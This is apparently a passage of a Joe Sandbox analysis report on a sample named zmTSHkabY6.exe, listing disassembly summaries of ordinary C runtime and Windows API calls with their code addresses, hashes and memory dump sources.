                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                    • String ID:
                                                                    • API String ID: 2565136772-0
                                                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                    • Instruction ID: fb947f359a730675b6be8315fbf97a556483bba619d5ec4bdedab00fd96663e6
                                                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                    • Instruction Fuzzy Hash: 520156B5F40721ABD7202B75AD09BAA3BA8AB4CB05B194121FD0DE2195D76CC8418769
                                                                    APIs
                                                                    • __RTC_Initialize.LIBCMT ref: 1000291D
                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                    • String ID:
                                                                    • API String ID: 2442719207-0
                                                                    • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                                    • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                                    • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                                    • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                    • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                    • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                                    • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                                    • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                                    • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\zmTSHkabY6.exe$obA
                                                                    • API String ID: 0-3443419229
                                                                    • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                                    • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                                                    • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                                    • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                    • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                    • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                                    • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                                    • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                                    • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                                    APIs
                                                                      • Part of subcall function 00E972B1: _free.LIBCMT ref: 00E972D6
                                                                    • _free.LIBCMT ref: 00E97337
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E97342
                                                                    • _free.LIBCMT ref: 00E9734D
                                                                    • _free.LIBCMT ref: 00E973A1
                                                                    • _free.LIBCMT ref: 00E973AC
                                                                    • _free.LIBCMT ref: 00E973B7
                                                                    • _free.LIBCMT ref: 00E973C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                                    • Instruction ID: c65d7e5c934e4f4a7db2f59c6eab4242d543b734cedc34b2fb50e619f3da14fd
                                                                    • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                                    • Instruction Fuzzy Hash: 54114CB5564B18AADE20BBB0CC47FCB7BDCAF06700F402C15F2E9B6062DA65B5188661
                                                                    APIs
                                                                      • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                                                    • _free.LIBCMT ref: 004170D0
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 004170DB
                                                                    • _free.LIBCMT ref: 004170E6
                                                                    • _free.LIBCMT ref: 0041713A
                                                                    • _free.LIBCMT ref: 00417145
                                                                    • _free.LIBCMT ref: 00417150
                                                                    • _free.LIBCMT ref: 0041715B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                                    • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
                                                                    • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                                    • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 00E97F82
                                                                    • __fassign.LIBCMT ref: 00E98161
                                                                    • __fassign.LIBCMT ref: 00E9817E
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E981C6
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E98206
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E982B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                                    • Instruction ID: b1c548fa13e6d2458c35b483d8a703f77caae40c5b9ecc207b4098d75dcf607c
                                                                    • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                                    • Instruction Fuzzy Hash: 4ED1CC71D016489FCF15CFE8C9809EDBBB5FF4A304F28116AE855BB262DB31A946CB50
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                                                    • __fassign.LIBCMT ref: 00417EFA
                                                                    • __fassign.LIBCMT ref: 00417F17
                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                                    • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                                                    • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                                    • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                                    • __fassign.LIBCMT ref: 1000B905
                                                                    • __fassign.LIBCMT ref: 1000B922
                                                                    • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 1735259414-0
                                                                    • Opcode ID: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                                                    • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                                    • Opcode Fuzzy Hash: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                                                    • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00E8B002,00E8A5C6,00E89C00), ref: 00E8B019
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E8B027
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E8B040
                                                                    • SetLastError.KERNEL32(00000000,00E8B002,00E8A5C6,00E89C00), ref: 00E8B092
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                    • Instruction ID: 52215440b0484a5933a21afaa7d14eff0bbffcae32c408c1c48a71bd154173ad
                                                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                    • Instruction Fuzzy Hash: 81018832609711AFA6343FB47C859572A94EB01779730523AF52C761F2FF694C125354
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                                                    • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                    • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                    • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                                    • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                                    • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                                    • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                                    • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                                    Strings
                                                                    • C:\Users\user\Desktop\zmTSHkabY6.exe, xrefs: 00E96388
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                    • API String ID: 0-808907004
                                                                    • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                                    • Instruction ID: 28e2db7de0142b84d6a9223a344b479e9a163da8f430ee11824f79b45caa2b1d
                                                                    • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                                    • Instruction Fuzzy Hash: BF2180B1600105AF9F20BFA18D81D6B77EEAB453A8710A526F929B6250E731EC508761
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3664257935-2084034818
                                                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                    • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                    • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,74DEDF80,?), ref: 0040EF64
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,74DEDF80,?), ref: 0040EF9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                                    • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                                                    • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                                    • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                                    • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                                    • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                                    • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                                    • __alloca_probe_16.LIBCMT ref: 1000A736
                                                                    • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                                    • __freea.LIBCMT ref: 1000A837
                                                                    • __freea.LIBCMT ref: 1000A843
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: __alloca_probe_16__freea$Info
                                                                    • String ID:
                                                                    • API String ID: 2330168043-0
                                                                    • Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                                    • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                                    • Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                                    • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 00413724
                                                                    • __alloca_probe_16.LIBCMT ref: 004137EA
                                                                    • __freea.LIBCMT ref: 00413856
                                                                      • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                                    • __freea.LIBCMT ref: 0041385F
                                                                    • __freea.LIBCMT ref: 00413882
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1423051803-0
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                                    • __alloca_probe_16.LIBCMT ref: 1000B101
                                                                    • __freea.LIBCMT ref: 1000B16D
                                                                      • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                                    • __freea.LIBCMT ref: 1000B176
                                                                    • __freea.LIBCMT ref: 1000B199
                                                                    Memory Dump Source
